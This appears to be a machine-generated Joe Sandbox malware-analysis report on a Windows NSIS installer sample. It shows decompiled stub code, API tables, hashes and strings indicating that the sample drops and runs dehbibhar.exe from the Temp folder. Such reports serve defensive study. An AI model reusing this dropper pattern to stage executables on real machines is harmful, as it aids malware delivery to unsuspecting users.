                          0x00403e5a
                          0x00403e5f
                          0x00403e61
                          0x00403e7d
                          0x00000000
                          0x00403e7d
                          0x00403e63
                          0x00403e69
                          0x00403e71
                          0x00403e71
                          0x00000000
                          0x00403e69
                          0x00403dde
                          0x00403de9
                          0x00403dee
                          0x00403df0
                          0x00403df7
                          0x00403df7
                          0x00403e02
                          0x00403e0a
                          0x00403e0c
                          0x00403e0e
                          0x00403e17
                          0x00403e1a
                          0x00403e20
                          0x00403e20
                          0x00403e3f
                          0x00403e50
                          0x00000000
                          0x00403e55
                          0x00403dbd
                          0x00403dbf
                          0x00000000
                          0x00403d34
                          0x00403d34
                          0x00403d40
                          0x00403d4a
                          0x00403d50
                          0x00403d55
                          0x00403d64
                          0x00403e82
                          0x00403e82
                          0x00000000
                          0x00403e82
                          0x00403d73
                          0x00403dae
                          0x00000000
                          0x00403dae
                          0x00403c6b
                          0x00403c6b
                          0x00403c6e
                          0x00403c70
                          0x00000000
                          0x00000000
                          0x00403c7e
                          0x00403c90
                          0x00403c95
                          0x00403c9e
                          0x00000000
                          0x00000000
                          0x00403ca4
                          0x00403ca6
                          0x00403cb3
                          0x00403cb3
                          0x00403cbc
                          0x00403cc2
                          0x00403cea
                          0x00403cf2
                          0x00000000
                          0x00403cd4
                          0x00403cd5
                          0x00403cde
                          0x00403ce4
                          0x00403ce5
                          0x00000000
                          0x00403ce5
                          0x00403ce0
                          0x00403ce2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403ce2
                          0x00403cc2

                          APIs
                            • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                            • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                          • GetUserDefaultUILanguage.KERNELBASE(00000002,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403BD0
                            • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                          • lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,?,?,?,C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,00000000,C:\Users\user\AppData\Local\Temp,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,76CDFAA0), ref: 00403CB7
                          • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,?,?,?,C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,00000000,C:\Users\user\AppData\Local\Temp,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
                          • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,?,00000000,?), ref: 00403CD5
                          • LoadImageW.USER32 ref: 00403D1E
                          • RegisterClassW.USER32 ref: 00403D5B
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403D73
                          • CreateWindowExW.USER32 ref: 00403DA8
                          • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
                          • GetClassInfoW.USER32 ref: 00403E0A
                          • GetClassInfoW.USER32 ref: 00403E17
                          • RegisterClassW.USER32 ref: 00403E20
                          • DialogBoxParamW.USER32 ref: 00403E3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                          • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                          • API String ID: 606308-856595589
                          • Opcode ID: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
                          • Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
                          • Opcode Fuzzy Hash: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
                          • Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 321 40307d-4030cb GetTickCount GetModuleFileNameW call 405ff7 324 4030d7-403105 call 406507 call 405e22 call 406507 GetFileSize 321->324 325 4030cd-4030d2 321->325 333 4031f0-4031fe call 403019 324->333 334 40310b 324->334 326 4032ad-4032b1 325->326 340 403200-403203 333->340 341 403253-403258 333->341 336 403110-403127 334->336 338 403129 336->338 339 40312b-403134 call 403499 336->339 338->339 347 40325a-403262 call 403019 339->347 348 40313a-403141 339->348 343 403205-40321d call 4034af call 403499 340->343 344 403227-403251 GlobalAlloc call 4034af call 4032b4 340->344 341->326 343->341 369 40321f-403225 343->369 344->341 367 403264-403275 344->367 347->341 352 403143-403157 call 405fb2 348->352 353 4031bd-4031c1 348->353 358 4031cb-4031d1 352->358 372 403159-403160 352->372 357 4031c3-4031ca call 403019 353->357 353->358 357->358 364 4031e0-4031e8 358->364 365 4031d3-4031dd call 4069c1 358->365 364->336 368 4031ee 364->368 365->364 374 403277 367->374 375 40327d-403282 367->375 368->333 369->341 369->344 372->358 373 403162-403169 372->373 373->358 377 40316b-403172 373->377 374->375 378 403283-403289 375->378 377->358 379 403174-40317b 377->379 378->378 380 40328b-4032a6 SetFilePointer call 405fb2 378->380 379->358 381 40317d-40319d 379->381 384 4032ab 380->384 381->341 383 4031a3-4031a7 381->383 385 4031a9-4031ad 383->385 386 4031af-4031b7 383->386 384->326 385->368 385->386 386->358 387 4031b9-4031bb 386->387 387->358
                          C-Code - Quality: 78%
                          			E0040307D(void* __eflags, signed int _a4) {
                          				DWORD* _v8;
                          				DWORD* _v12;
                          				void* _v16;
                          				intOrPtr _v20;
                          				char _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				signed int _v44;
                          				long _t43;
                          				long _t50;
                          				void* _t53;
                          				void* _t57;
                          				intOrPtr* _t59;
                          				long _t60;
                          				long _t70;
                          				signed int _t77;
                          				intOrPtr _t80;
                          				long _t82;
                          				void* _t85;
                          				signed int _t87;
                          				void* _t89;
                          				long _t90;
                          				long _t93;
                          				void* _t94;
                          
                          				_t82 = 0;
                          				_v12 = 0;
                          				_v8 = 0;
                          				_t43 = GetTickCount();
                          				_t91 = L"C:\\Users\\jones\\Desktop\\dhGoVvfmul.exe";
                          				 *0x42a22c = _t43 + 0x3e8;
                          				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\dhGoVvfmul.exe", 0x400);
                          				_t89 = E00405FF7(_t91, 0x80000000, 3);
                          				_v16 = _t89;
                          				 *0x40a018 = _t89;
                          				if(_t89 == 0xffffffff) {
                          					return L"Error launching installer";
                          				}
                          				E00406507(0x436800, _t91);
                          				E00406507(0x439000, E00405E22(0x436800));
                          				_t50 = GetFileSize(_t89, 0);
                          				 *0x420ec4 = _t50;
                          				_t93 = _t50;
                          				if(_t50 <= 0) {
                          					L24:
                          					E00403019(1);
                          					if( *0x42a234 == _t82) {
                          						goto L29;
                          					}
                          					if(_v8 == _t82) {
                          						L28:
                          						_t34 =  &_v24; // 0x403847
                          						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                          						_t94 = _t53;
                          						E004034AF( *0x42a234 + 0x1c);
                          						_t35 =  &_v24; // 0x403847
                          						_push( *_t35);
                          						_push(_t94);
                          						_push(_t82);
                          						_push(0xffffffff); // executed
                          						_t57 = E004032B4(); // executed
                          						if(_t57 == _v24) {
                          							 *0x42a230 = _t94;
                          							 *0x42a238 =  *_t94;
                          							if((_v44 & 0x00000001) != 0) {
                          								 *0x42a23c =  *0x42a23c + 1;
                          							}
                          							_t40 = _t94 + 0x44; // 0x44
                          							_t59 = _t40;
                          							_t85 = 8;
                          							do {
                          								_t59 = _t59 - 8;
                          								 *_t59 =  *_t59 + _t94;
                          								_t85 = _t85 - 1;
                          							} while (_t85 != 0);
                          							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                          							 *(_t94 + 0x3c) = _t60;
                          							E00405FB2(0x42a240, _t94 + 4, 0x40);
                          							return 0;
                          						}
                          						goto L29;
                          					}
                          					E004034AF( *0x414eb8);
                          					if(E00403499( &_a4, 4) == 0 || _v12 != _a4) {
                          						goto L29;
                          					} else {
                          						goto L28;
                          					}
                          				} else {
                          					do {
                          						_t90 = _t93;
                          						asm("sbb eax, eax");
                          						_t70 = ( ~( *0x42a234) & 0x00007e00) + 0x200;
                          						if(_t93 >= _t70) {
                          							_t90 = _t70;
                          						}
                          						if(E00403499(0x40ceb8, _t90) == 0) {
                          							E00403019(1);
                          							L29:
                          							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                          						}
                          						if( *0x42a234 != 0) {
                          							if((_a4 & 0x00000002) == 0) {
                          								E00403019(0);
                          							}
                          							goto L20;
                          						}
                          						E00405FB2( &_v44, 0x40ceb8, 0x1c);
                          						_t77 = _v44;
                          						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                          							_a4 = _a4 | _t77;
                          							_t87 =  *0x414eb8; // 0x9000
                          							 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
                          							_t80 = _v20;
                          							 *0x42a234 = _t87;
                          							if(_t80 > _t93) {
                          								goto L29;
                          							}
                          							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                          								_v8 = _v8 + 1;
                          								_t93 = _t80 - 4;
                          								if(_t90 > _t93) {
                          									_t90 = _t93;
                          								}
                          								goto L20;
                          							} else {
                          								break;
                          							}
                          						}
                          						L20:
                          						if(_t93 <  *0x420ec4) {
                          							_v12 = E004069C1(_v12, 0x40ceb8, _t90);
                          						}
                          						 *0x414eb8 =  *0x414eb8 + _t90;
                          						_t93 = _t93 - _t90;
                          					} while (_t93 != 0);
                          					_t82 = 0;
                          					goto L24;
                          				}
                          			}





























                          0x00403085
                          0x00403088
                          0x0040308b
                          0x0040308e
                          0x00403094
                          0x004030a5
                          0x004030aa
                          0x004030bd
                          0x004030c2
                          0x004030c5
                          0x004030cb
                          0x00000000
                          0x004030cd
                          0x004030de
                          0x004030ef
                          0x004030f6
                          0x004030fe
                          0x00403103
                          0x00403105
                          0x004031f0
                          0x004031f2
                          0x004031fe
                          0x00000000
                          0x00000000
                          0x00403203
                          0x00403227
                          0x00403227
                          0x0040322c
                          0x00403232
                          0x0040323d
                          0x00403242
                          0x00403242
                          0x00403245
                          0x00403246
                          0x00403247
                          0x00403249
                          0x00403251
                          0x00403268
                          0x00403270
                          0x00403275
                          0x00403277
                          0x00403277
                          0x0040327f
                          0x0040327f
                          0x00403282
                          0x00403283
                          0x00403283
                          0x00403286
                          0x00403288
                          0x00403288
                          0x00403292
                          0x00403298
                          0x004032a6
                          0x00000000
                          0x004032ab
                          0x00000000
                          0x00403251
                          0x0040320b
                          0x0040321d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040310b
                          0x00403110
                          0x00403115
                          0x00403119
                          0x00403120
                          0x00403127
                          0x00403129
                          0x00403129
                          0x00403134
                          0x0040325c
                          0x00403253
                          0x00000000
                          0x00403253
                          0x00403141
                          0x004031c1
                          0x004031c5
                          0x004031ca
                          0x00000000
                          0x004031c1
                          0x0040314a
                          0x0040314f
                          0x00403157
                          0x0040317d
                          0x00403183
                          0x0040318c
                          0x00403192
                          0x00403197
                          0x0040319d
                          0x00000000
                          0x00000000
                          0x004031a7
                          0x004031af
                          0x004031b2
                          0x004031b7
                          0x004031b9
                          0x004031b9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004031a7
                          0x004031cb
                          0x004031d1
                          0x004031dd
                          0x004031dd
                          0x004031e0
                          0x004031e6
                          0x004031e6
                          0x004031ee
                          0x00000000
                          0x004031ee

                          APIs
                          • GetTickCount.KERNEL32 ref: 0040308E
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\dhGoVvfmul.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
                            • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\dhGoVvfmul.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                            • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\dhGoVvfmul.exe,C:\Users\user\Desktop\dhGoVvfmul.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
                          • GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\dhGoVvfmul.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                          • API String ID: 2803837635-396302320
                          • Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                          • Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
                          • Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                          • Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 452 40176f-401794 call 402da6 call 405e4d 457 401796-40179c call 406507 452->457 458 40179e-4017b0 call 406507 call 405dd6 lstrcatW 452->458 463 4017b5-4017b6 call 40678e 457->463 458->463 467 4017bb-4017bf 463->467 468 4017c1-4017cb call 40683d 467->468 469 4017f2-4017f5 467->469 476 4017dd-4017ef 468->476 477 4017cd-4017db CompareFileTime 468->477 470 4017f7-4017f8 call 405fd2 469->470 471 4017fd-401819 call 405ff7 469->471 470->471 479 40181b-40181e 471->479 480 40188d-4018b6 call 405569 call 4032b4 471->480 476->469 477->476 481 401820-40185e call 406507 * 2 call 406544 call 406507 call 405b67 479->481 482 40186f-401879 call 405569 479->482 492 4018b8-4018bc 480->492 493 4018be-4018ca SetFileTime 480->493 481->467 514 401864-401865 481->514 494 401882-401888 482->494 492->493 496 4018d0-4018db FindCloseChangeNotification 492->496 493->496 497 402c33 494->497 499 4018e1-4018e4 496->499 500 402c2a-402c2d 496->500 501 402c35-402c39 497->501 504 4018e6-4018f7 call 406544 lstrcatW 499->504 505 4018f9-4018fc call 406544 499->505 500->497 511 401901-4023a2 call 405b67 504->511 505->511 511->500 511->501 514->494 516 401867-401868 514->516 516->482
                          C-Code - Quality: 61%
                          			E0040176F(FILETIME* __ebx, void* __eflags) {
                          				void* __esi;
                          				void* _t35;
                          				void* _t43;
                          				void* _t45;
                          				FILETIME* _t51;
                          				FILETIME* _t64;
                          				void* _t66;
                          				signed int _t72;
                          				FILETIME* _t73;
                          				FILETIME* _t77;
                          				signed int _t79;
                          				WCHAR* _t81;
                          				void* _t83;
                          				void* _t84;
                          				void* _t86;
                          
                          				_t77 = __ebx;
                          				 *(_t86 - 8) = E00402DA6(0x31);
                          				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                          				_t35 = E00405E4D( *(_t86 - 8));
                          				_push( *(_t86 - 8));
                          				_t81 = L"C:\\Users\\jones\\AppData\\Local";
                          				if(_t35 == 0) {
                          					lstrcatW(E00405DD6(E00406507(_t81, 0x436000)), ??);
                          				} else {
                          					E00406507();
                          				}
                          				E0040678E(_t81);
                          				while(1) {
                          					__eflags =  *(_t86 + 8) - 3;
                          					if( *(_t86 + 8) >= 3) {
                          						_t66 = E0040683D(_t81);
                          						_t79 = 0;
                          						__eflags = _t66 - _t77;
                          						if(_t66 != _t77) {
                          							_t73 = _t66 + 0x14;
                          							__eflags = _t73;
                          							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                          						}
                          						asm("sbb eax, eax");
                          						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                          						__eflags = _t72;
                          						 *(_t86 + 8) = _t72;
                          					}
                          					__eflags =  *(_t86 + 8) - _t77;
                          					if( *(_t86 + 8) == _t77) {
                          						E00405FD2(_t81);
                          					}
                          					__eflags =  *(_t86 + 8) - 1;
                          					_t43 = E00405FF7(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                          					__eflags = _t43 - 0xffffffff;
                          					 *(_t86 - 0x38) = _t43;
                          					if(_t43 != 0xffffffff) {
                          						break;
                          					}
                          					__eflags =  *(_t86 + 8) - _t77;
                          					if( *(_t86 + 8) != _t77) {
                          						E00405569(0xffffffe2,  *(_t86 - 8));
                          						__eflags =  *(_t86 + 8) - 2;
                          						if(__eflags == 0) {
                          							 *((intOrPtr*)(_t86 - 4)) = 1;
                          						}
                          						L31:
                          						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
                          						__eflags =  *0x42a2a8;
                          						goto L32;
                          					} else {
                          						E00406507(0x40b5c8, _t83);
                          						E00406507(_t83, _t81);
                          						E00406544(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                          						E00406507(_t83, 0x40b5c8);
                          						_t64 = E00405B67("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                          						__eflags = _t64;
                          						if(_t64 == 0) {
                          							continue;
                          						} else {
                          							__eflags = _t64 == 1;
                          							if(_t64 == 1) {
                          								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
                          								L32:
                          								_t51 = 0;
                          								__eflags = 0;
                          							} else {
                          								_push(_t81);
                          								_push(0xfffffffa);
                          								E00405569();
                          								L29:
                          								_t51 = 0x7fffffff;
                          							}
                          						}
                          					}
                          					L33:
                          					return _t51;
                          				}
                          				E00405569(0xffffffea,  *(_t86 - 8));
                          				 *0x42a2d4 =  *0x42a2d4 + 1;
                          				_push(_t77);
                          				_push(_t77);
                          				_push( *(_t86 - 0x38));
                          				_push( *((intOrPtr*)(_t86 - 0x28)));
                          				_t45 = E004032B4(); // executed
                          				 *0x42a2d4 =  *0x42a2d4 - 1;
                          				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                          				_t84 = _t45;
                          				if( *(_t86 - 0x24) != 0xffffffff) {
                          					L22:
                          					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                          				} else {
                          					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                          					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                          						goto L22;
                          					}
                          				}
                          				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                          				__eflags = _t84 - _t77;
                          				if(_t84 >= _t77) {
                          					goto L31;
                          				} else {
                          					__eflags = _t84 - 0xfffffffe;
                          					if(_t84 != 0xfffffffe) {
                          						E00406544(_t77, _t81, _t84, _t81, 0xffffffee);
                          					} else {
                          						E00406544(_t77, _t81, _t84, _t81, 0xffffffe9);
                          						lstrcatW(_t81,  *(_t86 - 8));
                          					}
                          					_push(0x200010);
                          					_push(_t81);
                          					E00405B67();
                          					goto L29;
                          				}
                          				goto L33;
                          			}


















                          0x0040176f
                          0x00401776
                          0x00401782
                          0x00401785
                          0x0040178a
                          0x0040178d
                          0x00401794
                          0x004017b0
                          0x00401796
                          0x00401797
                          0x00401797
                          0x004017b6
                          0x004017bb
                          0x004017bb
                          0x004017bf
                          0x004017c2
                          0x004017c7
                          0x004017c9
                          0x004017cb
                          0x004017d0
                          0x004017d0
                          0x004017db
                          0x004017db
                          0x004017ec
                          0x004017ee
                          0x004017ee
                          0x004017ef
                          0x004017ef
                          0x004017f2
                          0x004017f5
                          0x004017f8
                          0x004017f8
                          0x004017ff
                          0x0040180e
                          0x00401813
                          0x00401816
                          0x00401819
                          0x00000000
                          0x00000000
                          0x0040181b
                          0x0040181e
                          0x00401874
                          0x00401879
                          0x004015b6
                          0x0040292e
                          0x0040292e
                          0x00402c2a
                          0x00402c2d
                          0x00402c2d
                          0x00000000
                          0x00401820
                          0x00401826
                          0x0040182d
                          0x0040183a
                          0x00401845
                          0x0040185b
                          0x0040185b
                          0x0040185e
                          0x00000000
                          0x00401864
                          0x00401864
                          0x00401865
                          0x00401882
                          0x00402c33
                          0x00402c33
                          0x00402c33
                          0x00401867
                          0x00401867
                          0x00401868
                          0x00401493
                          0x0040239d
                          0x0040239d
                          0x0040239d
                          0x00401865
                          0x0040185e
                          0x00402c35
                          0x00402c39
                          0x00402c39
                          0x00401892
                          0x00401897
                          0x0040189d
                          0x0040189e
                          0x0040189f
                          0x004018a2
                          0x004018a5
                          0x004018aa
                          0x004018b0
                          0x004018b4
                          0x004018b6
                          0x004018be
                          0x004018ca
                          0x004018b8
                          0x004018b8
                          0x004018bc
                          0x00000000
                          0x00000000
                          0x004018bc
                          0x004018d3
                          0x004018d9
                          0x004018db
                          0x00000000
                          0x004018e1
                          0x004018e1
                          0x004018e4
                          0x004018fc
                          0x004018e6
                          0x004018e9
                          0x004018f2
                          0x004018f2
                          0x00401901
                          0x00401906
                          0x00402398
                          0x00000000
                          0x00402398
                          0x00000000

                          APIs
                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,00000000,00000000,C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl,00436000,?,?,00000031), ref: 004017D5
                            • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
                            • Part of subcall function 00405569: lstrlenW.KERNEL32(004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                            • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,004226E8,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                            • Part of subcall function 00405569: lstrcatW.KERNEL32(004226E8,004033ED), ref: 004055C4
                            • Part of subcall function 00405569: SetWindowTextW.USER32(004226E8,004226E8), ref: 004055D6
                            • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                            • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                            • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.272825833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.272822223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272839095.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272843221.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272863409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272868401.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272878674.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272884650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272891964.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272896993.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.272906493.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_dhGoVvfmul.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                          • API String ID: 1941528284-2432991694
                          • Opcode ID: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
                          • Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
                          • Opcode Fuzzy Hash: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
                          • Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
